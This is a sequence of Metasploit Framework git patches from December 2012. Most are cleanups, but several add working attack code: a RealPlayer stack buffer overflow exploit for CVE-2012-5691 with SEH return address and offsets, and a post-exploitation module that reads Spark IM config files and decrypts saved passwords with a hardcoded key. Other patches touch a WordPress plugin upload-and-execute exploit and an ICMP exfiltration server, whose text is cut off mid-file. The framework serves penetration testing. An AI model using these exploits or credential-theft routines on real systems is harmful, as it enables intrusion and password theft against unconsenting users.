a/modules/exploits/windows/fileformat/mini_stream_pls_bof.rb b/modules/exploits/windows/fileformat/mini_stream_pls_bof.rb index 1255746bc7..305ebe9b4d 100644 --- a/modules/exploits/windows/fileformat/mini_stream_pls_bof.rb +++ b/modules/exploits/windows/fileformat/mini_stream_pls_bof.rb @@ -25,7 +25,7 @@ class Metasploit3 < Msf::Exploit::Remote [ 'Madjix', # original discovery 'Tiago Henriques', # metasploit module - 'James Fitts' # clean ups + 'James Fitts ' # clean ups ], 'Version' => '$Revision$', 'References' => diff --git a/modules/exploits/windows/scada/sunway_force_control_netdbsrv.rb b/modules/exploits/windows/scada/sunway_force_control_netdbsrv.rb index 791bf6016a..6c1af780ae 100644 --- a/modules/exploits/windows/scada/sunway_force_control_netdbsrv.rb +++ b/modules/exploits/windows/scada/sunway_force_control_netdbsrv.rb @@ -25,7 +25,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Author' => [ 'Luigi Auriemma', # original discovery 'Rinat Ziyayev', - 'James Fitts' + 'James Fitts ' ], 'License' => MSF_LICENSE, 'References' => From 2682908ff294e6ac52196e412e73ccca28e97c8b Mon Sep 17 00:00:00 2001 From: sinn3r Date: Mon, 24 Dec 2012 18:20:46 -0600 Subject: [PATCH 066/154] Small corrections here and there --- .../webapp/wp_asset_manager_upload_exec.rb | 18 +++++++++--------- 1 file changed, 9 insertions(+), 9 deletions(-) diff --git a/modules/exploits/unix/webapp/wp_asset_manager_upload_exec.rb b/modules/exploits/unix/webapp/wp_asset_manager_upload_exec.rb index 82643ad696..c49bf6f6ad 100644 --- a/modules/exploits/unix/webapp/wp_asset_manager_upload_exec.rb +++ b/modules/exploits/unix/webapp/wp_asset_manager_upload_exec.rb @@ -2,7 +2,7 @@ # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ +# http://metasploit.com/framework/ ## require 'msf/core' @@ -24,7 +24,7 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => [ - 'Sammy FORGIT', # initial discovery + 'Sammy FORGIT', # initial discovery 'James Fitts ' # metasploit module ], 'License' => MSF_LICENSE, @@ -40,7 +40,7 @@ class Metasploit3 < Msf::Exploit::Remote 'BadChars' => "\x00", }, 'Platform' => 'php', - 'Arch' => ARCH_PHP, + 'Arch' => ARCH_PHP, 'Targets' => [ [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ], @@ -68,10 +68,10 @@ class Metasploit3 < Msf::Exploit::Remote print_status("#{peer} - Uploading payload #{payload_name}") res = send_request_cgi({ - 'method' => 'POST', - 'uri' => "#{uri}wp-content/plugins/asset-manager/upload.php", - 'ctype' => "multipart/form-data; boundary=#{data.bound}", - 'data' => post_data + 'method' => 'POST', + 'uri' => "#{uri}wp-content/plugins/asset-manager/upload.php", + 'ctype' => "multipart/form-data; boundary=#{data.bound}", + 'data' => post_data }) if not res or res.code != 200 or res.body !~ /#{payload_name}/ @@ -80,8 +80,8 @@ class Metasploit3 < Msf::Exploit::Remote print_status("#{peer} - Executing payload #{payload_name}") res = send_request_raw({ - 'uri' => "#{uri}wp-content/uploads/assets/temp/#{payload_name}", - 'method' => 'GET' + 'uri' => "#{uri}wp-content/uploads/assets/temp/#{payload_name}", + 'method' => 'GET' }) if res and res.code != 200 From fec989026f5e6035b5202e58e30e8af7c4f830b2 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Tue, 25 Dec 2012 18:05:10 +0100 Subject: [PATCH 067/154] Added module for CVE-2012-5691 --- .../real_player_url_property_bof.rb | 87 +++++++++++++++++++ 1 file changed, 87 insertions(+) create mode 100644 modules/exploits/windows/fileformat/real_player_url_property_bof.rb diff --git a/modules/exploits/windows/fileformat/real_player_url_property_bof.rb b/modules/exploits/windows/fileformat/real_player_url_property_bof.rb new file mode 100644 index 0000000000..8fe2ec4dec --- /dev/null +++ b/modules/exploits/windows/fileformat/real_player_url_property_bof.rb @@ -0,0 +1,87 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::FILEFORMAT + include Msf::Exploit::Seh + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'RealPlayer File Handling Buffer Overflow', + 'Description' => %q{ + This module exploits a stack based buffer overflow on RealPlayer <=15.0.6.14. + The vulnerability exists in the handling of real media files, due to the insecure + usage of the GetPrivateProfileString function to retrieve the URL property from an + InternetShortcut section. + + This module generates a malicious rm file which must be opened with RealPlayer via + drag and drop or double click methods. It has been tested successfully on Windows + XP SP3 with RealPlayer 15.0.5.109. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'suto ' # Vulnerability discovery, metasploit module + ], + 'References' => + [ + [ 'CVE', '2012-5691' ], + [ 'OSVDB', '88486' ], + [ 'BID', '56956' ], + [ 'URL', 'http://service.real.com/realplayer/security/12142012_player/en/' ] + ], + 'DefaultOptions' => + { + 'ExitFunction' => 'process' + }, + 'Platform' => 'win', + 'Payload' => + { + 'BadChars' => "\x00\x0a\x0d", + 'DisableNops' => true, + 'Space' => 2000 + }, + 'Targets' => + [ + [ 'Windows XP SP3 / Real Player 15.0.5.109', + { + 'Ret' => 0x63f2b4b5, # ppr from rpap3260.dll + 'OffsetOne' => 2312, # Open via double click + 'OffsetTwo' => 2964 # Open via drag and drop + } + ] + ], + 'Privileged' => false, + 'DisclosureDate' => 'Dec 14 2012', + 'DefaultTarget' => 0)) + + register_options([OptString.new('FILENAME', [ false, 'The file name.', 'msf.rm']),], self.class) + + end + + def exploit + + buffer = payload.encoded + buffer << "A" * (target['OffsetOne'] - buffer.length) # Open the file via double click + buffer << generate_seh_record(target.ret) + buffer << Metasm::Shellcode.assemble(Metasm::Ia32.new, "call $-#{target['OffsetOne'] + 8}").encode_string + buffer << "A" * (target['OffsetTwo'] - buffer.length) # Open the file via drag and drop to the real player + buffer << generate_seh_record(target.ret) + buffer << Metasm::Shellcode.assemble(Metasm::Ia32.new, "call $-#{target['OffsetTwo'] + 8}").encode_string + buffer << "B" * 7000 # Generate exception + + content = "[InternetShortcut]\nURL=" + filecontent = content+buffer + + file_create(filecontent) + + end +end \ No newline at end of file From e895ccb6b1932d84e81f2b5310e79cfed3df505a Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Tue, 25 Dec 2012 18:13:02 +0100 Subject: [PATCH 068/154] added random string functions --- .../windows/fileformat/real_player_url_property_bof.rb | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/modules/exploits/windows/fileformat/real_player_url_property_bof.rb b/modules/exploits/windows/fileformat/real_player_url_property_bof.rb index 8fe2ec4dec..25d66cb334 100644 --- a/modules/exploits/windows/fileformat/real_player_url_property_bof.rb +++ b/modules/exploits/windows/fileformat/real_player_url_property_bof.rb @@ -70,13 +70,13 @@ class Metasploit3 < Msf::Exploit::Remote def exploit buffer = payload.encoded - buffer << "A" * (target['OffsetOne'] - buffer.length) # Open the file via double click + buffer << rand_text(target['OffsetOne'] - buffer.length) # Open the file via double click buffer << generate_seh_record(target.ret) buffer << Metasm::Shellcode.assemble(Metasm::Ia32.new, "call $-#{target['OffsetOne'] + 8}").encode_string - buffer << "A" * (target['OffsetTwo'] - buffer.length) # Open the file via drag and drop to the real player + buffer << rand_text(target['OffsetTwo'] - buffer.length) # Open the file via drag and drop to the real player buffer << generate_seh_record(target.ret) buffer << Metasm::Shellcode.assemble(Metasm::Ia32.new, "call $-#{target['OffsetTwo'] + 8}").encode_string - buffer << "B" * 7000 # Generate exception + buffer << rand_text(7000) # Generate exception content = "[InternetShortcut]\nURL=" filecontent = content+buffer From 91ad23f79e9f2ec9488ae772eae4ad1fa6e13fe4 Mon Sep 17 00:00:00 2001 From: Alexandre Maloteaux Date: Tue, 25 Dec 2012 19:33:07 +0100 Subject: [PATCH 069/154] pcaprub typo --- external/pcaprub/extconf.rb | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/external/pcaprub/extconf.rb b/external/pcaprub/extconf.rb index fa87b197d1..0a54a1bc36 100644 --- a/external/pcaprub/extconf.rb +++ b/external/pcaprub/extconf.rb @@ -9,7 +9,8 @@ puts "\n[*] Running checks for netifaces code added by metasploit project" puts "-----------------------------------------------------------------" #uncoment to force ioctl on non windows systems #@force_ioctl = true -@supported_archs = ["i386-mingw32", "i486-linux", "universal-darwin10.0", "i386-openbsd4.8","i386-freebsd8","arm-linux-eabi"] +@supported_archs = [ "i386-mingw32", "i486-linux","x86_64-linux", + "universal-darwin10.0", "i386-openbsd4.8","i386-freebsd8","arm-linux-eabi"] #arm-linux-eabi tested on maemo5 / N900 puts "[*] Warning : this platform as not been tested" unless @supported_archs.include? RUBY_PLATFORM From 0b2ea3e55e3f1700eaa03942c46dfb2ad0e04410 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Wed, 26 Dec 2012 11:14:48 -0600 Subject: [PATCH 070/154] Fix weird tabs vs spaces prob --- .../real_player_url_property_bof.rb | 20 +++++++++---------- 1 file changed, 10 insertions(+), 10 deletions(-) diff --git a/modules/exploits/windows/fileformat/real_player_url_property_bof.rb b/modules/exploits/windows/fileformat/real_player_url_property_bof.rb index 25d66cb334..1ff9b65f3a 100644 --- a/modules/exploits/windows/fileformat/real_player_url_property_bof.rb +++ b/modules/exploits/windows/fileformat/real_player_url_property_bof.rb @@ -15,8 +15,8 @@ class Metasploit3 < Msf::Exploit::Remote def initialize(info = {}) super(update_info(info, - 'Name' => 'RealPlayer File Handling Buffer Overflow', - 'Description' => %q{ + 'Name' => 'RealPlayer File Handling Buffer Overflow', + 'Description' => %q{ This module exploits a stack based buffer overflow on RealPlayer <=15.0.6.14. The vulnerability exists in the handling of real media files, due to the insecure usage of the GetPrivateProfileString function to retrieve the URL property from an @@ -26,12 +26,12 @@ class Metasploit3 < Msf::Exploit::Remote drag and drop or double click methods. It has been tested successfully on Windows XP SP3 with RealPlayer 15.0.5.109. }, - 'License' => MSF_LICENSE, - 'Author' => + 'License' => MSF_LICENSE, + 'Author' => [ 'suto ' # Vulnerability discovery, metasploit module ], - 'References' => + 'References' => [ [ 'CVE', '2012-5691' ], [ 'OSVDB', '88486' ], @@ -42,14 +42,14 @@ class Metasploit3 < Msf::Exploit::Remote { 'ExitFunction' => 'process' }, - 'Platform' => 'win', - 'Payload' => + 'Platform' => 'win', + 'Payload' => { 'BadChars' => "\x00\x0a\x0d", 'DisableNops' => true, 'Space' => 2000 }, - 'Targets' => + 'Targets' => [ [ 'Windows XP SP3 / Real Player 15.0.5.109', { @@ -59,9 +59,9 @@ class Metasploit3 < Msf::Exploit::Remote } ] ], - 'Privileged' => false, + 'Privileged' => false, 'DisclosureDate' => 'Dec 14 2012', - 'DefaultTarget' => 0)) + 'DefaultTarget' => 0)) register_options([OptString.new('FILENAME', [ false, 'The file name.', 'msf.rm']),], self.class) From 8223df375d97193f985f4fb029290aedf558ffb4 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Wed, 26 Dec 2012 11:15:37 -0600 Subject: [PATCH 071/154] Avoid making the title sound too generic. --- .../exploits/windows/fileformat/real_player_url_property_bof.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/windows/fileformat/real_player_url_property_bof.rb b/modules/exploits/windows/fileformat/real_player_url_property_bof.rb index 1ff9b65f3a..a9d911f362 100644 --- a/modules/exploits/windows/fileformat/real_player_url_property_bof.rb +++ b/modules/exploits/windows/fileformat/real_player_url_property_bof.rb @@ -15,7 +15,7 @@ class Metasploit3 < Msf::Exploit::Remote def initialize(info = {}) super(update_info(info, - 'Name' => 'RealPlayer File Handling Buffer Overflow', + 'Name' => 'RealPlayer RealMedia File Handling Buffer Overflow', 'Description' => %q{ This module exploits a stack based buffer overflow on RealPlayer <=15.0.6.14. The vulnerability exists in the handling of real media files, due to the insecure From 7147e7a09bad4ae6cc9285f2ad34f551b98c81ed Mon Sep 17 00:00:00 2001 From: Brandon McCann Date: Wed, 26 Dec 2012 17:28:23 -0600 Subject: [PATCH 072/154] added spark_im post exploit module --- .../windows/gather/credentials/spark_im.rb | 113 ++++++++++++++++++ 1 file changed, 113 insertions(+) create mode 100644 modules/post/windows/gather/credentials/spark_im.rb diff --git a/modules/post/windows/gather/credentials/spark_im.rb b/modules/post/windows/gather/credentials/spark_im.rb new file mode 100644 index 0000000000..b308e4fac9 --- /dev/null +++ b/modules/post/windows/gather/credentials/spark_im.rb @@ -0,0 +1,113 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' +require 'rex' +require 'msf/core/post/common' +require 'msf/core/post/windows/user_profiles' +require 'openssl' + +class Metasploit3 < Msf::Post + + include Msf::Post::Common + include Msf::Post::Windows::UserProfiles + + def initialize(info={}) + super(update_info(info, + 'Name' => 'Enumerate Spark IM Passwords', + 'Description' => %q{ This module will enumerate passwords stored by the Spark IM client. + The encryption key is publicly known. This module will not only extract encrypted password + but will also decrypt password using public key. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Brandon McCann "zeknox" ', + 'Thomas McCarthy "smilingraccoon" ' + ], + 'SessionTypes' => [ 'meterpreter' ], + 'References' => + [ + [ 'URL', 'http://adamcaudill.com/2012/07/27/decrypting-spark-saved-passwords/'] + ] + )) + end + + # decrypt spark password + def decrypt(hash) + # code to decrypt hash with KEY + print_status("Starting to decrypt password hash") + + encrypted = hash.unpack("m")[0] + key = "ugfpV1dMC5jyJtqwVAfTpHkxqJ0+E0ae".unpack("m")[0] + + cipher = OpenSSL::Cipher::Cipher.new 'des-ede3' + cipher.decrypt + cipher.key = key + + password = cipher.update encrypted + password << cipher.final + + password = password.encode('UTF-8') + + credentials = password.split("\u0001") + print_good("Decrypted Username #{credentials[0]} Password: #{credentials[1]}") + + store_creds(credentials) + end + + def store_creds(credentials) + if db + report_auth_info( + :host => client.sock.peerhost, + :port => 445, + :ptype => 'password', + :sname => 'smb', + :user => credentials[0], + :pass => credentials[1], + :duplicate_ok => true, + :active => true + ) + print_status("Loot stored in the db") + end + end + + # main control method + def run + grab_user_profiles().each do |user| + unless user['AppData'].nil? + accounts = user['AppData'] + "\\Spark\\spark.properties" + + # open the file for reading + config = client.fs.file.new(accounts, 'r') rescue nil + next if config.nil? + print_status("Config found for user #{user['UserName']}") + + # read the contents of file + contents = config.read + + # look for lines containing string 'password' + password = contents.split("\n").grep(/password/) + if password.nil? + # file doesn't contain a password + print_status("#{file} does not contain any saved passwords") + # close file and return + config.close + return + end + + # store the hash close the file + hash = password[1].split("password").join.chomp + print_status("Spark password hash: #{hash}") if datastore['VERBOSE'] + config.close + + # call to decrypt the hash + decrypt(hash) + end + end + end +end \ No newline at end of file From 073565c00182073cef04c730f51012a14eec8de6 Mon Sep 17 00:00:00 2001 From: Brandon McCann Date: Wed, 26 Dec 2012 18:33:10 -0600 Subject: [PATCH 073/154] modified port and sname in db logging --- modules/post/windows/gather/credentials/spark_im.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/post/windows/gather/credentials/spark_im.rb b/modules/post/windows/gather/credentials/spark_im.rb index b308e4fac9..0e15a5b292 100644 --- a/modules/post/windows/gather/credentials/spark_im.rb +++ b/modules/post/windows/gather/credentials/spark_im.rb @@ -64,9 +64,9 @@ class Metasploit3 < Msf::Post if db report_auth_info( :host => client.sock.peerhost, - :port => 445, + :port => 5222, :ptype => 'password', - :sname => 'smb', + :sname => 'spark', :user => credentials[0], :pass => credentials[1], :duplicate_ok => true, From bcc651a1b214868cbca35fd5823662e519d2b897 Mon Sep 17 00:00:00 2001 From: Brandon McCann Date: Wed, 26 Dec 2012 19:49:25 -0600 Subject: [PATCH 074/154] modified password parsing, and utf encoding --- modules/post/windows/gather/credentials/spark_im.rb | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/modules/post/windows/gather/credentials/spark_im.rb b/modules/post/windows/gather/credentials/spark_im.rb index 0e15a5b292..d09f5b2318 100644 --- a/modules/post/windows/gather/credentials/spark_im.rb +++ b/modules/post/windows/gather/credentials/spark_im.rb @@ -52,7 +52,7 @@ class Metasploit3 < Msf::Post password = cipher.update encrypted password << cipher.final - password = password.encode('UTF-8') + password = ::Rex::Text.to_utf8(password) credentials = password.split("\u0001") print_good("Decrypted Username #{credentials[0]} Password: #{credentials[1]}") @@ -91,7 +91,7 @@ class Metasploit3 < Msf::Post contents = config.read # look for lines containing string 'password' - password = contents.split("\n").grep(/password/) + password= contents.split("\n").grep(/password/) if password.nil? # file doesn't contain a password print_status("#{file} does not contain any saved passwords") @@ -101,7 +101,8 @@ class Metasploit3 < Msf::Post end # store the hash close the file - hash = password[1].split("password").join.chomp + password = password.delete_if {|e| e !~ /password.+=.+=\r/} + hash = password[0].split("password").join.chomp print_status("Spark password hash: #{hash}") if datastore['VERBOSE'] config.close From d70d2c4a193a8e289a8066c29ff856990e9dfc17 Mon Sep 17 00:00:00 2001 From: Brandon McCann Date: Wed, 26 Dec 2012 19:54:35 -0600 Subject: [PATCH 075/154] typo --- modules/post/windows/gather/credentials/spark_im.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/post/windows/gather/credentials/spark_im.rb b/modules/post/windows/gather/credentials/spark_im.rb index d09f5b2318..fa20a2bb46 100644 --- a/modules/post/windows/gather/credentials/spark_im.rb +++ b/modules/post/windows/gather/credentials/spark_im.rb @@ -91,7 +91,7 @@ class Metasploit3 < Msf::Post contents = config.read # look for lines containing string 'password' - password= contents.split("\n").grep(/password/) + password = contents.split("\n").grep(/password/) if password.nil? # file doesn't contain a password print_status("#{file} does not contain any saved passwords") From b71729bf5f75ba8e1f31a5015f71a1338cc8b7e6 Mon Sep 17 00:00:00 2001 From: Brandon McCann Date: Wed, 26 Dec 2012 20:32:41 -0600 Subject: [PATCH 076/154] fixed multi stored creds issue --- .../post/windows/gather/credentials/spark_im.rb | 16 +++++++++++----- 1 file changed, 11 insertions(+), 5 deletions(-) diff --git a/modules/post/windows/gather/credentials/spark_im.rb b/modules/post/windows/gather/credentials/spark_im.rb index fa20a2bb46..7c74d87d3d 100644 --- a/modules/post/windows/gather/credentials/spark_im.rb +++ b/modules/post/windows/gather/credentials/spark_im.rb @@ -102,12 +102,18 @@ class Metasploit3 < Msf::Post # store the hash close the file password = password.delete_if {|e| e !~ /password.+=.+=\r/} - hash = password[0].split("password").join.chomp - print_status("Spark password hash: #{hash}") if datastore['VERBOSE'] - config.close + password.each do | pass | + if pass.nil? + next + end - # call to decrypt the hash - decrypt(hash) + hash = pass.split("password").join.chomp + print_status("Spark password hash: #{hash}") if datastore['VERBOSE'] + + # call method to decrypt hash + decrypt(hash) + config.close + end end end end From e3c1d5a5c0304754568274b93767ba1a92eb2464 Mon Sep 17 00:00:00 2001 From: Brandon McCann Date: Wed, 26 Dec 2012 20:40:11 -0600 Subject: [PATCH 077/154] fixed config.close bug --- modules/post/windows/gather/credentials/spark_im.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/post/windows/gather/credentials/spark_im.rb b/modules/post/windows/gather/credentials/spark_im.rb index 7c74d87d3d..9f83c6e174 100644 --- a/modules/post/windows/gather/credentials/spark_im.rb +++ b/modules/post/windows/gather/credentials/spark_im.rb @@ -112,8 +112,8 @@ class Metasploit3 < Msf::Post # call method to decrypt hash decrypt(hash) - config.close end + config.close end end end From 6e520e7a2aedb02b8348830bec26d78888226f93 Mon Sep 17 00:00:00 2001 From: Brandon McCann Date: Wed, 26 Dec 2012 21:06:48 -0600 Subject: [PATCH 078/154] converted split into a scan --- modules/post/windows/gather/credentials/spark_im.rb | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/modules/post/windows/gather/credentials/spark_im.rb b/modules/post/windows/gather/credentials/spark_im.rb index 9f83c6e174..7ff2fe698b 100644 --- a/modules/post/windows/gather/credentials/spark_im.rb +++ b/modules/post/windows/gather/credentials/spark_im.rb @@ -54,21 +54,21 @@ class Metasploit3 < Msf::Post password = ::Rex::Text.to_utf8(password) - credentials = password.split("\u0001") - print_good("Decrypted Username #{credentials[0]} Password: #{credentials[1]}") + user, pass = password.scan(/[[:print:]]+/) + print_good("Decrypted Username #{user} Password: #{pass}") - store_creds(credentials) + store_creds(user, pass) end - def store_creds(credentials) + def store_creds(user, pass) if db report_auth_info( :host => client.sock.peerhost, :port => 5222, :ptype => 'password', :sname => 'spark', - :user => credentials[0], - :pass => credentials[1], + :user => user, + :pass => pass, :duplicate_ok => true, :active => true ) From da49f67079ddf6b866de0bf41b118b8f9b8ed2a2 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Wed, 26 Dec 2012 21:10:52 -0600 Subject: [PATCH 079/154] Only show the password when exists --- modules/post/windows/gather/credentials/spark_im.rb | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/modules/post/windows/gather/credentials/spark_im.rb b/modules/post/windows/gather/credentials/spark_im.rb index 7ff2fe698b..65a153ac84 100644 --- a/modules/post/windows/gather/credentials/spark_im.rb +++ b/modules/post/windows/gather/credentials/spark_im.rb @@ -40,8 +40,6 @@ class Metasploit3 < Msf::Post # decrypt spark password def decrypt(hash) # code to decrypt hash with KEY - print_status("Starting to decrypt password hash") - encrypted = hash.unpack("m")[0] key = "ugfpV1dMC5jyJtqwVAfTpHkxqJ0+E0ae".unpack("m")[0] @@ -55,6 +53,7 @@ class Metasploit3 < Msf::Post password = ::Rex::Text.to_utf8(password) user, pass = password.scan(/[[:print:]]+/) + return if pass.nil? or pass.empty? print_good("Decrypted Username #{user} Password: #{pass}") store_creds(user, pass) From 4ce1df22141ca32d91b609c6b60d749d49396e98 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Wed, 26 Dec 2012 21:13:02 -0600 Subject: [PATCH 080/154] Change module title for consistency --- modules/post/windows/gather/credentials/spark_im.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/post/windows/gather/credentials/spark_im.rb b/modules/post/windows/gather/credentials/spark_im.rb index 65a153ac84..76e24ab494 100644 --- a/modules/post/windows/gather/credentials/spark_im.rb +++ b/modules/post/windows/gather/credentials/spark_im.rb @@ -18,7 +18,7 @@ class Metasploit3 < Msf::Post def initialize(info={}) super(update_info(info, - 'Name' => 'Enumerate Spark IM Passwords', + 'Name' => 'Windows Gather Spark IM Password Extraction', 'Description' => %q{ This module will enumerate passwords stored by the Spark IM client. The encryption key is publicly known. This module will not only extract encrypted password but will also decrypt password using public key. @@ -53,7 +53,7 @@ class Metasploit3 < Msf::Post password = ::Rex::Text.to_utf8(password) user, pass = password.scan(/[[:print:]]+/) - return if pass.nil? or pass.empty? + return pass.nil? or pass.empty? print_good("Decrypted Username #{user} Password: #{pass}") store_creds(user, pass) From 919d6daa415a261c92d24606c84d6d59ce804fb2 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Wed, 26 Dec 2012 21:14:26 -0600 Subject: [PATCH 081/154] Even if there's password, we should prolly keep the username --- modules/post/windows/gather/credentials/spark_im.rb | 8 ++++++-- 1 file changed, 6 insertions(+), 2 deletions(-) diff --git a/modules/post/windows/gather/credentials/spark_im.rb b/modules/post/windows/gather/credentials/spark_im.rb index 76e24ab494..9643fb0723 100644 --- a/modules/post/windows/gather/credentials/spark_im.rb +++ b/modules/post/windows/gather/credentials/spark_im.rb @@ -53,8 +53,12 @@ class Metasploit3 < Msf::Post password = ::Rex::Text.to_utf8(password) user, pass = password.scan(/[[:print:]]+/) - return pass.nil? or pass.empty? - print_good("Decrypted Username #{user} Password: #{pass}") + if pass.nil? or pass.empty? + print_status("Username found: #{user}, but no password") + pass = '' + else + print_good("Decrypted Username #{user} Password: #{pass}") + end store_creds(user, pass) end From 0f6b72dad5a7dc0f4cb183b3e880535664cdefb3 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Wed, 26 Dec 2012 21:16:04 -0600 Subject: [PATCH 082/154] Final touchup --- modules/post/windows/gather/credentials/spark_im.rb | 13 +++++++------ 1 file changed, 7 insertions(+), 6 deletions(-) diff --git a/modules/post/windows/gather/credentials/spark_im.rb b/modules/post/windows/gather/credentials/spark_im.rb index 9643fb0723..d1453b2eb4 100644 --- a/modules/post/windows/gather/credentials/spark_im.rb +++ b/modules/post/windows/gather/credentials/spark_im.rb @@ -19,15 +19,16 @@ class Metasploit3 < Msf::Post def initialize(info={}) super(update_info(info, 'Name' => 'Windows Gather Spark IM Password Extraction', - 'Description' => %q{ This module will enumerate passwords stored by the Spark IM client. - The encryption key is publicly known. This module will not only extract encrypted password - but will also decrypt password using public key. + 'Description' => %q{ + This module will enumerate passwords stored by the Spark IM client. + The encryption key is publicly known. This module will not only extract encrypted + password but will also decrypt password using public key. }, 'License' => MSF_LICENSE, 'Author' => [ - 'Brandon McCann "zeknox" ', - 'Thomas McCarthy "smilingraccoon" ' + 'Brandon McCann "zeknox" ', + 'Thomas McCarthy "smilingraccoon" ' ], 'SessionTypes' => [ 'meterpreter' ], 'References' => @@ -120,4 +121,4 @@ class Metasploit3 < Msf::Post end end end -end \ No newline at end of file +end From daf5465bbdbc3ead083439714db0cf2b761a29d0 Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Thu, 27 Dec 2012 09:08:40 -0600 Subject: [PATCH 083/154] Whitespace Cleanup --- external/pcaprub/extconf.rb | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/external/pcaprub/extconf.rb b/external/pcaprub/extconf.rb index 0a54a1bc36..872a7eed3a 100644 --- a/external/pcaprub/extconf.rb +++ b/external/pcaprub/extconf.rb @@ -9,8 +9,9 @@ puts "\n[*] Running checks for netifaces code added by metasploit project" puts "-----------------------------------------------------------------" #uncoment to force ioctl on non windows systems #@force_ioctl = true -@supported_archs = [ "i386-mingw32", "i486-linux","x86_64-linux", - "universal-darwin10.0", "i386-openbsd4.8","i386-freebsd8","arm-linux-eabi"] +@supported_archs = [ "i386-mingw32", "i486-linux", "x86_64-linux", + "universal-darwin10.0", "i386-openbsd4.8", "i386-freebsd8", + "arm-linux-eabi" ] #arm-linux-eabi tested on maemo5 / N900 puts "[*] Warning : this platform as not been tested" unless @supported_archs.include? RUBY_PLATFORM From 121353b36024e273f38c6ced8c5e48a1bbc992c0 Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Thu, 27 Dec 2012 13:54:47 -0600 Subject: [PATCH 084/154] Fixing EOLs to unix In vim: :set fileformat=unix :wq ta-da --- modules/auxiliary/server/icmp_exfil.rb | 518 ++++++++++++------------- 1 file changed, 257 insertions(+), 261 deletions(-) diff --git a/modules/auxiliary/server/icmp_exfil.rb b/modules/auxiliary/server/icmp_exfil.rb index f06a15b3eb..4d3530a8f6 100644 --- a/modules/auxiliary/server/icmp_exfil.rb +++ b/modules/auxiliary/server/icmp_exfil.rb @@ -1,261 +1,257 @@ -## -# $Id$ -## - -## -# This file is part of the Metasploit Framework and may be subject to -# redistribution and commercial restrictions. Please see the Metasploit -# web site for more information on licensing and terms of use. -# http://metasploit.com/ -## - -require 'msf/core' - -class Metasploit3 < Msf::Auxiliary - - include Msf::Exploit::Remote::Capture - include Msf::Auxiliary::Report - - def initialize - super( - 'Name' => 'ICMP Exfiltration Service', - 'Description' => %q{ - This module is designed to provide a server-side component to receive and store files - exfiltrated over ICMP echo request packets. - - To use this module you will need to send an initial ICMP echo request containing the - specific start trigger (defaults to '^BOF') this can be followed by the filename being sent (or - a random filename can be assisnged). All data received from this source will automatically - be added to the receive buffer until an ICMP echo request containing a specific end trigger - (defaults to '^EOL') is received. - - Suggested Client: - Data can be sent from the client using a variety of tools. One such example is nping (included - with the NMAP suite of tools) - usage: nping --icmp 10.0.0.1 --data-string "BOFtest.txt" -c1 - }, - 'Author' => 'Chris John Riley', - 'License' => MSF_LICENSE, - 'References' => - [ - # packetfu - ['URL','http://code.google.com/p/packetfu/'], - # nping - ['URL', 'http://nmap.org/book/nping-man.html'], - # simple icmp - ['URL', 'http://blog.c22.cc/2012/02/17/quick-post-fun-with-python-ctypes-simpleicmp/'] - ] - ) - - register_options([ - OptString.new('START_TRIGGER', [true, 'Trigger for beginning of file', '^BOF']), - OptString.new('END_TRIGGER', [true, 'Trigger for end of file', '^EOF']), - OptString.new('RESP_START', [true, 'Data to respond when initial trigger matches', 'SEND']), - OptString.new('RESP_CONT', [true, 'Data ro resond when continuation of data expected', 'OK']), - OptString.new('RESP_END', [true, 'Data to response when EOF received and data saved', 'COMPLETE']), - OptString.new('BPF_FILTER', [true, 'BFP format filter to listen for', 'icmp']), - OptString.new('INTERFACE', [false, 'The name of the interface']), - OptBool.new('FNAME_IN_PACKET', [true, 'Filename presented in first packet straight after START_TRIGGER', true]) - ], self.class) - - register_advanced_options([ - OptEnum.new('CLOAK', [true, 'OS fingerprint to use for packet creation', 'linux', ['windows', 'linux', 'freebsd']]), - OptBool.new('PROMISC', [true, 'Enable/Disable promiscuous mode', false]), - OptAddress.new('LOCALIP', [false, 'The IP address of the local interface']) - ], self.class) - - deregister_options('SNAPLEN','FILTER','PCAPFILE','RHOST','UDP_SECRET','GATEWAY','NETMASK', 'TIMEOUT') - end - - def run - begin - # check Pcaprub is up to date - if not netifaces_implemented? - print_error("WARNING : Pcaprub is not uptodate, some functionality will not be available") - netifaces = false - else - netifaces = true - end - - @interface = datastore['INTERFACE'] || Pcap.lookupdev - # this is needed on windows cause we send interface directly to Pcap functions - @interface = 